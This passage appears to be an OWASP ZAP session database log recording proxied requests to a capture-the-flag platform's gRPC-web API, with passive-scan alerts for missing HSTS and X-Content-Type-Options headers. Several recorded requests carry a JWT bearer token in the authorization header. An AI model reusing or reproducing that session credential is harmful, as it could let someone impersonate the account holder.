Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: */*\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aReferer: https://play.cscg.live/\u000d\u000aauthorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOiIzMDYwODYxNzY1ODUxNTQ1NjAiLCJleHAiOjE3MDk5MTMzMjh9.JpFHIOU8-a2WYlNV5ULXkK-u_99MLNy-igxO672RIuI\u000d\u000acontent-type: application/grpc-web+proto\u000d\u000ax-grpc-web: 1\u000d\u000ax-user-agent: connect-es/1.3.0\u000d\u000aContent-Length: 44\u000d\u000aOrigin: https://play.cscg.live\u000d\u000aConnection: keep-alive\u000d\u000aSec-Fetch-Dest: empty\u000d\u000aSec-Fetch-Mode: cors\u000d\u000aSec-Fetch-Site: same-site\u000d\u000a\u000d\u000a','00000000270a18373232653363613365393262363863656666353830336664120b696e74726f2d7765622d32','HTTP/1.1 200 OK\u000d\u000aAccess-Control-Allow-Origin: https://play.cscg.live\u000d\u000aAccess-Control-Expose-Headers: Vary, Date, Content-Type, Access-Control-Allow-Origin, grpc-status, grpc-message\u000d\u000aAlt-Svc: h3=":443"; ma=2592000\u000d\u000aContent-Type: application/grpc-web+proto\u000d\u000aServer: Caddy\u000d\u000aVary: Origin\u000d\u000aDate: Sat, 02 Mar 2024 02:35:04 GMT\u000d\u000acontent-length: 129\u000d\u000a\u000d\u000a','00000000670a1837323265336361336539326236386365666635383033666410011a49123d3732326533636133653932623638636566663538303366642d313032342d696e74726f2d7765622d322e6368616c6c656e67652e637363672e6c69766518b90a220568747470738000000010677270632d7374617475733a20300d0a',NULL,'',TRUE) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(28,323,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 29 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=27 -INSERT INTO BLOCKS VALUES(27,1,0) -INSERT INTO BLOCKS VALUES(28,2147483619,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=27 -INSERT INTO LOBS VALUES(27,1,0,28) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(28,1,'2024-03-02 03:35:04.813000',1,28,NULL,323,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=28 -INSERT INTO LOB_IDS VALUES(28,323,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(18,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',13,13,'','',319,15,3,'','10035-1') -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=1 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Origin' AND USED=7 AND FLAGS='' AND VALS='https://play.cscg.live' -INSERT INTO PARAM VALUES(1,'api.cscg.live:444','header','Access-Control-Allow-Origin',8,'','https://play.cscg.live') -COMMIT -DELETE FROM PARAM WHERE PARAMID=2 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Expose-Headers' AND USED=5 AND FLAGS='' AND VALS='Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message' -INSERT INTO PARAM VALUES(2,'api.cscg.live:444','header','Access-Control-Expose-Headers',6,'','Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message,Vary%2C Date%2C Content-Type%2C Access-Control-Allow-Origin%2C grpc-status%2C grpc-message') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(39,18,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(40,18,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=3 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Alt-Svc' AND USED=7 AND FLAGS='' AND VALS='h3=":443"; ma=2592000' -INSERT INTO PARAM VALUES(3,'api.cscg.live:444','header','Alt-Svc',8,'','h3=":443"; ma=2592000') -COMMIT -DELETE FROM PARAM WHERE PARAMID=4 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Content-Type' AND USED=5 AND FLAGS='' AND VALS='application/grpc-web+proto' -INSERT INTO PARAM VALUES(4,'api.cscg.live:444','header','Content-Type',6,'','application/grpc-web+proto') -COMMIT -DELETE FROM PARAM WHERE PARAMID=5 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Server' AND USED=7 AND FLAGS='' AND VALS='Caddy' -INSERT INTO PARAM VALUES(5,'api.cscg.live:444','header','Server',8,'','Caddy') -COMMIT -DELETE FROM PARAM WHERE PARAMID=6 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Vary' AND USED=5 AND FLAGS='' AND VALS='Origin' -INSERT INTO PARAM VALUES(6,'api.cscg.live:444','header','Vary',6,'','Origin') -COMMIT -DELETE FROM PARAM WHERE PARAMID=7 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Date' AND USED=7 AND FLAGS='' AND VALS='Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT' -INSERT INTO PARAM VALUES(7,'api.cscg.live:444','header','Date',8,'','Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT') -COMMIT -DELETE FROM PARAM WHERE PARAMID=8 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='content-length' AND USED=5 AND FLAGS='' AND VALS='129' -INSERT INTO PARAM VALUES(8,'api.cscg.live:444','header','content-length',6,'','129') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(29,552,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 30 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=28 -INSERT INTO BLOCKS VALUES(28,1,0) -INSERT INTO BLOCKS VALUES(29,2147483618,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=28 -INSERT INTO LOBS VALUES(28,1,0,29) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(29,1,'2024-03-02 03:35:05.035000',1,29,NULL,552,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=29 -INSERT INTO LOB_IDS VALUES(29,552,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(19,0,10021,'X-Content-Type-Options Header Missing',1,2,'The Anti-MIME-Sniffing header X-Content-Type-Options was not set to ''nosniff''. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','x-content-type-options','This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.\u000aAt "High" threshold this scan rule will not alert on client or server error responses.','Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to ''nosniff'' for all web pages.\u000aIf possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.','https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/gg622941(v=vs.85)\u000ahttps://owasp.org/www-community/Security_Headers',13,13,'','',693,15,3,'','10021') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(41,19,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(42,19,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(30,573,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 31 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=29 -INSERT INTO BLOCKS VALUES(29,1,0) -INSERT INTO BLOCKS VALUES(30,2147483617,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=29 -INSERT INTO LOBS VALUES(29,1,0,30) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(30,1,'2024-03-02 03:35:05.038000',1,30,NULL,573,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=30 -INSERT INTO LOB_IDS VALUES(30,573,1,40) -COMMIT -/*C3*/INSERT INTO HISTORY VALUES(14,1709346750724,1,200,1709346906638,170,'POST','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','POST https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus HTTP/1.1\u000d\u000ahost: api.cscg.live:444\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: */*\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aReferer: https://play.cscg.live/\u000d\u000aauthorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOiIzMDYwODYxNzY1ODUxNTQ1NjAiLCJleHAiOjE3MDk5MTMzMjh9.JpFHIOU8-a2WYlNV5ULXkK-u_99MLNy-igxO672RIuI\u000d\u000acontent-type: application/grpc-web+proto\u000d\u000ax-grpc-web: 1\u000d\u000ax-user-agent: connect-es/1.3.0\u000d\u000aContent-Length: 44\u000d\u000aOrigin: https://play.cscg.live\u000d\u000aConnection: keep-alive\u000d\u000aSec-Fetch-Dest: empty\u000d\u000aSec-Fetch-Mode: cors\u000d\u000aSec-Fetch-Site: same-site\u000d\u000a\u000d\u000a','00000000270a18373232653363613365393262363863656666353830336664120b696e74726f2d7765622d32','HTTP/1.1 200 OK\u000d\u000aAccess-Control-Allow-Origin: https://play.cscg.live\u000d\u000aAccess-Control-Expose-Headers: Access-Control-Allow-Origin, Vary, Date, Content-Type, grpc-status, grpc-message\u000d\u000aAlt-Svc: h3=":443"; ma=2592000\u000d\u000aContent-Type: application/grpc-web+proto\u000d\u000aServer: Caddy\u000d\u000aVary: Origin\u000d\u000aDate: Sat, 02 Mar 2024 02:35:06 GMT\u000d\u000acontent-length: 129\u000d\u000a\u000d\u000a','00000000670a1837323265336361336539326236386365666635383033666410011a49123d3732326533636133653932623638636566663538303366642d313032342d696e74726f2d7765622d322e6368616c6c656e67652e637363672e6c69766518b90a220568747470738000000010677270632d7374617475733a20300d0a',NULL,'',TRUE) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(31,323,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 32 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=30 -INSERT INTO BLOCKS VALUES(30,1,0) -INSERT INTO BLOCKS VALUES(31,2147483616,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=30 -INSERT INTO LOBS VALUES(30,1,0,31) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(31,1,'2024-03-02 03:35:06.809000',1,31,NULL,323,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=31 -INSERT INTO LOB_IDS VALUES(31,323,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(20,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',14,14,'','',319,15,3,'','10035-1') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(43,20,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(44,20,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=1 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Origin' AND USED=8 AND FLAGS='' AND VALS='https://play.cscg.live' -INSERT INTO PARAM VALUES(1,'api.cscg.live:444','header','Access-Control-Allow-Origin',9,'','https://play.cscg.live') -COMMIT -DELETE FROM PARAM WHERE PARAMID=2 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Expose-Headers' AND USED=6 AND FLAGS='' AND VALS='Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message,Vary%2C Date%2C Content-Type%2C Access-Control-Allow-Origin%2C grpc-status%2C grpc-message' -INSERT INTO PARAM VALUES(2,'api.cscg.live:444','header','Access-Control-Expose-Headers',7,'','Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message,Vary%2C Date%2C Content-Type%2C Access-Control-Allow-Origin%2C grpc-status%2C grpc-message') -COMMIT -DELETE FROM PARAM WHERE PARAMID=3 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Alt-Svc' AND USED=8 AND FLAGS='' AND VALS='h3=":443"; ma=2592000' -INSERT INTO PARAM VALUES(3,'api.cscg.live:444','header','Alt-Svc',9,'','h3=":443"; ma=2592000') -COMMIT -DELETE FROM PARAM WHERE PARAMID=4 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Content-Type' AND USED=6 AND FLAGS='' AND VALS='application/grpc-web+proto' -INSERT INTO PARAM VALUES(4,'api.cscg.live:444','header','Content-Type',7,'','application/grpc-web+proto') -COMMIT -DELETE FROM PARAM WHERE PARAMID=5 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Server' AND USED=8 AND FLAGS='' AND VALS='Caddy' -INSERT INTO PARAM VALUES(5,'api.cscg.live:444','header','Server',9,'','Caddy') -COMMIT -DELETE FROM PARAM WHERE PARAMID=6 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Vary' AND USED=6 AND FLAGS='' AND VALS='Origin' -INSERT INTO PARAM VALUES(6,'api.cscg.live:444','header','Vary',7,'','Origin') -COMMIT -DELETE FROM PARAM WHERE PARAMID=7 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Date' AND USED=8 AND FLAGS='' AND VALS='Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT' -INSERT INTO PARAM VALUES(7,'api.cscg.live:444','header','Date',9,'','Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:35:06 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT') -COMMIT -DELETE FROM PARAM WHERE PARAMID=8 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='content-length' AND USED=6 AND FLAGS='' AND VALS='129' -INSERT INTO PARAM VALUES(8,'api.cscg.live:444','header','content-length',7,'','129') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(32,552,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 33 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=31 -INSERT INTO BLOCKS VALUES(31,1,0) -INSERT INTO BLOCKS VALUES(32,2147483615,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=31 -INSERT INTO LOBS VALUES(31,1,0,32) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(32,1,'2024-03-02 03:35:07.025000',1,32,NULL,552,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=32 -INSERT INTO LOB_IDS VALUES(32,552,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(21,0,10021,'X-Content-Type-Options Header Missing',1,2,'The Anti-MIME-Sniffing header X-Content-Type-Options was not set to ''nosniff''. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','x-content-type-options','This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.\u000aAt "High" threshold this scan rule will not alert on client or server error responses.','Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to ''nosniff'' for all web pages.\u000aIf possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.','https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/gg622941(v=vs.85)\u000ahttps://owasp.org/www-community/Security_Headers',14,14,'','',693,15,3,'','10021') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(45,21,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(46,21,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(33,573,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 34 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=32 -INSERT INTO BLOCKS VALUES(32,1,0) -INSERT INTO BLOCKS VALUES(33,2147483614,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=32 -INSERT INTO LOBS VALUES(32,1,0,33) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(33,1,'2024-03-02 03:35:07.049000',1,33,NULL,573,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=33 -INSERT INTO LOB_IDS VALUES(33,573,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(34,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 35 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=33 -INSERT INTO BLOCKS VALUES(33,1,0) -INSERT INTO BLOCKS VALUES(34,2147483613,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=33 -INSERT INTO LOBS VALUES(33,1,0,34) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(34,1,'2024-03-02 03:35:07.950000',1,34,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=34 -INSERT INTO LOB_IDS VALUES(34,64,1,40) -COMMIT -/*C3*/INSERT INTO HISTORY VALUES(15,1709346750724,1,200,1709346908652,157,'OPTIONS','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','OPTIONS https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus HTTP/1.1\u000d\u000ahost: api.cscg.live:444\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: */*\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aAccess-Control-Request-Method: POST\u000d\u000aAccess-Control-Request-Headers: authorization,content-type,x-grpc-web,x-user-agent\u000d\u000aReferer: https://play.cscg.live/\u000d\u000aOrigin: https://play.cscg.live\u000d\u000aConnection: keep-alive\u000d\u000aSec-Fetch-Dest: empty\u000d\u000aSec-Fetch-Mode: cors\u000d\u000aSec-Fetch-Site: same-site\u000d\u000a\u000d\u000a','','HTTP/1.1 200 OK\u000d\u000aAccess-Control-Allow-Headers: content-type,accept,x-user-agent,x-grpc-web,grpc-status,grpc-message,authorization\u000d\u000aAccess-Control-Allow-Methods: GET,HEAD,POST,PUT,DELETE\u000d\u000aAccess-Control-Allow-Origin: https://play.cscg.live\u000d\u000aAlt-Svc: h3=":443"; ma=2592000\u000d\u000aContent-Length: 0\u000d\u000aDate: Sat, 02 Mar 2024 02:35:08 GMT\u000d\u000aServer: Caddy\u000d\u000a\u000d\u000a','',NULL,'',TRUE) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(35,324,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 36 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=34 -INSERT INTO BLOCKS VALUES(34,1,0) -INSERT INTO BLOCKS VALUES(35,2147483612,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=34 -INSERT INTO LOBS VALUES(34,1,0,35) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(35,1,'2024-03-02 03:35:08.811000',1,35,NULL,324,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=35 -INSERT INTO LOB_IDS VALUES(35,324,1,40) -COMMIT -/*C3*/INSERT INTO HISTORY VALUES(16,1709346750724,1,200,1709346908814,72,'POST','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','POST https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus HTTP/1.1\u000d\u000ahost: api.cscg.live:444\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: */*\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aReferer: https://play.cscg.live/\u000d\u000aauthorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOiIzMDYwODYxNzY1ODUxNTQ1NjAiLCJleHAiOjE3MDk5MTMzMjh9.JpFHIOU8-a2WYlNV5ULXkK-u_99MLNy-igxO672RIuI\u000d\u000acontent-type: application/grpc-web+proto\u000d\u000ax-grpc-web: 1\u000d\u000ax-user-agent: connect-es/1.3.0\u000d\u000aContent-Length: 44\u000d\u000aOrigin: https://play.cscg.live\u000d\u000aConnection: keep-alive\u000d\u000aSec-Fetch-Dest: empty\u000d\u000aSec-Fetch-Mode: cors\u000d\u000aSec-Fetch-Site: same-site\u000d\u000a\u000d\u000a','00000000270a18373232653363613365393262363863656666353830336664120b696e74726f2d7765622d32','HTTP/1.1 200 OK\u000d\u000aAccess-Control-Allow-Origin: https://play.cscg.live\u000d\u000aAccess-Control-Expose-Headers: Content-Type, Access-Control-Allow-Origin, Vary, Date, grpc-status, grpc-message\u000d\u000aAlt-Svc: h3=":443"; ma=2592000\u000d\u000aContent-Type: application/grpc-web+proto\u000d\u000aServer: Caddy\u000d\u000aVary: Origin\u000d\u000aDate: Sat, 02 Mar 2024 02:35:08 GMT\u000d\u000acontent-length: 129\u000d\u000a\u000d\u000a','00000000670a1837323265336361336539326236386365666635383033666410011a49123d3732326533636133653932623638636566663538303366642d313032342d696e74726f2d7765622d322e6368616c6c656e67652e637363672e6c69766518b90a220568747470738000000010677270632d7374617475733a20300d0a',NULL,'',TRUE) -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=18 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Headers' AND USED=2 AND FLAGS='' AND VALS='content-type%2Caccept%2Cx-user-agent%2Cx-grpc-web%2Cgrpc-status%2Cgrpc-message%2Cauthorization' -INSERT INTO PARAM VALUES(18,'api.cscg.live:444','header','Access-Control-Allow-Headers',3,'','content-type%2Caccept%2Cx-user-agent%2Cx-grpc-web%2Cgrpc-status%2Cgrpc-message%2Cauthorization') -COMMIT -DELETE FROM PARAM WHERE PARAMID=19 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Methods' AND USED=2 AND FLAGS='' AND VALS='GET%2CHEAD%2CPOST%2CPUT%2CDELETE' -INSERT INTO PARAM VALUES(19,'api.cscg.live:444','header','Access-Control-Allow-Methods',3,'','GET%2CHEAD%2CPOST%2CPUT%2CDELETE') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(36,322,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 37 -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=1 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Origin' AND USED=9 AND FLAGS='' AND VALS='https://play.cscg.live' -INSERT INTO PARAM VALUES(1,'api.cscg.live:444','header','Access-Control-Allow-Origin',10,'','https://play.cscg.live') -COMMIT -DELETE FROM PARAM WHERE PARAMID=3 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Alt-Svc' AND USED=9 AND FLAGS='' AND VALS='h3=":443"; ma=2592000' -INSERT INTO PARAM VALUES(3,'api.cscg.live:444','header','Alt-Svc',10,'','h3=":443"; ma=2592000') -COMMIT -DELETE FROM PARAM WHERE PARAMID=20 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Content-Length' AND USED=2 AND FLAGS='' AND VALS='0' -INSERT INTO PARAM VALUES(20,'api.cscg.live:444','header','Content-Length',3,'','0') -COMMIT -/*C1*/DELETE FROM BLOCKS WHERE BLOCK_ADDR=35 -INSERT INTO BLOCKS VALUES(35,1,0) -INSERT INTO BLOCKS VALUES(36,2147483611,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=35 -INSERT INTO LOBS VALUES(35,1,0,36) -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=7 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Date' AND USED=9 AND FLAGS='' AND VALS='Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:35:06 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT' -INSERT INTO PARAM VALUES(7,'api.cscg.live:444','header','Date',10,'','Sat%2C 02 Mar 2024 02:35:08 GMT,Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:35:06 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT') -COMMIT -DELETE FROM PARAM WHERE PARAMID=5 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Server' AND USED=9 AND FLAGS='' AND VALS='Caddy' -INSERT INTO PARAM VALUES(5,'api.cscg.live:444','header','Server',10,'','Caddy') -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO 